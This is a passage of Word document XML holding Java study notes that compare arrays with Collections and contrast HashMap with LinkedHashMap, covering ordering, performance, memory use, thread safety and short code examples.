          <v:rect id="_x0000_i1433" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="261E1D7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Memory Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5E07EB"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6E62B575"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ory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Memory is allocated at the time of array creation, and the size is fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD849B4"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3907681"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Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collections use dynamic memory allocation, meaning they allocate memory dynamically when elements are added or removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281EECDC"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2C4B1">
          <v:rect id="_x0000_i1434" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45717E07"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Access to Elements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFC9EAC"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F5FF4F0"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rect Access by Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Elements in an array can be accessed directly using an index (e.g., array[2]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F448DD4"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401D468"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irect Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collections may require methods like .get(index) for List or .iterator() for Set or Queue, and cannot always provide direct access by index (e.g., in a HashSet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053E842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06CCE">
          <v:rect id="_x0000_i1435" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A61AFDA"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e Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A4218D"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53A7F28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st suited for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fixed-size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> collections of elements where the size does not need to change, and when performance and speed are critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0F990D"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the days of the week (String[] days = {"Sunday", "Monday", ...}).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6F8588"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6264FB"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dynamic collections of elements that need to grow or shrink, or when you need additional operations like sorting, searching, or modifying data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C8E25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a list of users in a List&lt;User&gt;, or a set of unique IDs in a HashSet&lt;String&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559F6EC8"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6ADEA5">
          <v:rect id="_x0000_i1436" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6069C652"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Thread Safety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EA258F"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35AFBCC3"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Arrays themselves are not thread-safe unless additional synchronization is applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E94834"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D83B1AE"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for certain collections)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Some collections, like CopyOnWriteArrayList or ConcurrentHashMap, are thread-safe and designed for concurrent access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2044424B"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ollections are not thread-safe unless explicitly synchronized (e.g., Collections.synchronizedList()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B0082A"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C56EB">
          <v:rect id="_x0000_i1437" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D363A0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Examples of Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245DFC3C"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4A258D9"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Storing fixed data like the days of the week.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2337488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Storing a fixed number of elements that do not change (e.g., the first n Fibonacci numbers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE58E9A"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9C6895"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ArrayList for storing a dynamic list of users that can grow and shrink.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526516A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HashSet for storing unique elements, where duplicates are not allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B224475"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F3A01">
          <v:rect id="_x0000_i1438" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA8FC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493"/>
        <w:gridCol w:w="5002"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="111E13B8" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39F6CBBE"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BF30340"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4D0962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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="3815F8B6" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49E725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4391C22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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49D2D3D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77659948" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DF31F8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330D6D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single type)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="253B84E2"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for generics) or Heterogeneous (for non-generics)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="0CF89477" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FB64E6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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FEB7B6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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67E9BCB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0C917B7D" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37645B9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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="201B93B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cannot grow or shrink)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CFDB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upports resizing, insertion/removal, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="0985BEF4" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="443B2BE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0FE6F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fixed data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="561BF4A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resizing and extra functionality)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="51F8DE84" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AFB5C0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80633A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via index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30F8C0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access via methods (like .get())</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="65753765" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="537D5E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9661A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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="232BE17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llections are thread-safe (e.g., CopyOnWriteArrayList)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="3B3D5AFD" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CDAFB2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Use Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57E0E7D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data (e.g., days of the week, matrix)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A2C296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data (e.g., list of users, set of unique items)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53FA0" w:rsidRPr="00CE4B95" w14:paraId="2939DFF3" w14:textId="77777777" w:rsidTr="00D73299">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BD87E7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7B77896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33DFBBF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tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C512720"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120E3">
          <v:rect id="_x0000_i1439" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4056B2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de Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5915EA1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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C3489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Example {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C535A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A73AB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bers = new int[5];  // Fixed-size array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1884D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0] = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B67D6B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1] = 20;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A4829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33CF53"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0]);  // Output: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A57A8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1]);  // Output: 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5A12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98FF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95A5B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ArrayList) Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080432C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41CE472" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0374BAD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303004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D364F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  // Dynamic collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6789950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242838B7"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6149D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E243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0));  // Output: Apple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363B9AC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AE005D"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50C67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F09C18"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A10335"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Fixed-size, faster for simple, small collections where the size is known in advance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A04F4D2"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Flexible, dynamic, and provide a rich set of methods for managing and manipulating data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E99CE1D" w14:textId="447DB234" w:rsidR="00D73299" w:rsidRPr="00CE4B95"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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F8AE6A" w14:textId="77777777" w:rsidR="00E37BCB" w:rsidRPr="00CE4B95" w:rsidRDefault="00E37BCB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_Toc197867351"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between HashMap and LinkedHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w14:paraId="6EED9D1E" w14:textId="03950D1A" w:rsidR="00FF1E10" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF1E10"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implementations of the Map interface in Java, but they have important differences in terms of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>order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Here's a detailed comparison between the two:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB17046"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3A94C">
          <v:rect id="_x0000_i1441" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2D085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10A4F1EE"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2E1FD85"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rder Guarantee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HashMap does not maintain any order of its elements. The order of key-value pairs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xml:space="preserve"> and can change when the map is rehashed or modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C7AAC9"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0EFC832"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 Preserved</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: LinkedHashMap maintains the order of elements in the map based on the order in which they were </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inserted</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It keep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of entries to maintain this insertion order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E00494"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Optional)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It can also be configured to maintain </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>access order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the order in which the entries were last accessed), which is useful for implementing caches where frequently accessed entries move to the end of the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421C5025"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2A0CD">
          <v:rect id="_x0000_i1442" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="533B85F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erformance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D901FFD"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280807"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Lookup and Insertion</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HashMap generally performs better than LinkedHashMap when it comes to lookup and insertion operations because it does not have to maintain any ordering. Both operations are typic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53C8A339"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32AA1C4"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ightly Slower</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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ertion and Access Order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The ordering feature can cause a minor performance penalty during updates (insertion, removal, and reordering) compared to HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21675EB9"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FAA4B">
          <v:rect id="_x0000_i1443" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A9A62B"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mory Overhead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285873A0"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45876D9"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Since HashMap only stores the key-value pairs and does not maintain any linked list for ordering, it has a lower memory overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D445BD"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A843482"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LinkedHashMap maintains an additional linked list to track the insertion order or access order, which results in higher memory usage compared to HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDF38B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4E693">
          <v:rect id="_x0000_i1444" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8EB37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e Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F88D6C5"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FA40FE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Unordered Collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HashMap is suitable when you do not need the elements to be ordered and are primarily interested in fast lookups, insertions, and deletions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240387B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you need to store and retrieve data efficiently without any specific order (e.g., a map of user IDs and their associated data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367AF736"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266AAA23"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Maintaining Order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: LinkedHashMap is ideal when you need to preserve the insertion order or track the order of access to entries, such as in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cach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RU cache</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Least Recently Used).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650DBA2F"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the order in which elements are inserted or accessed is important (e.g., in maintaining a cache that evicts the least recently accessed entries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAC8320"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E5B62">
          <v:rect id="_x0000_i1445" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="272F4B9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teration Order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7418C7"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CE76F38"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ion order of entries in a HashMap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It may appear random and may change when the map is modified (rehashed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A2AAE3"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4C827D89"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teration order in a LinkedHashMap is predictable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4516DE04"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The order in which entries were inserted into the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195012DA"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if enabled)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The order in which entries were last accessed. This is useful for implementing cache-like structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEFEF0B"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4B179">
          <v:rect id="_x0000_i1446" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B2352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onstructor Differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AE60A1"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1BDC832"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HashMap()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B5F97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and Load Factor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: new HashMap(initialCapacity, loadFactor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4830E349"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168C4E2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LinkedHashMap()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9FC1FB"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Access Order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: new LinkedHashMap(initialCapacity, loadFactor, accessOrder)</w:t>
      </w:r>
    </w:p>
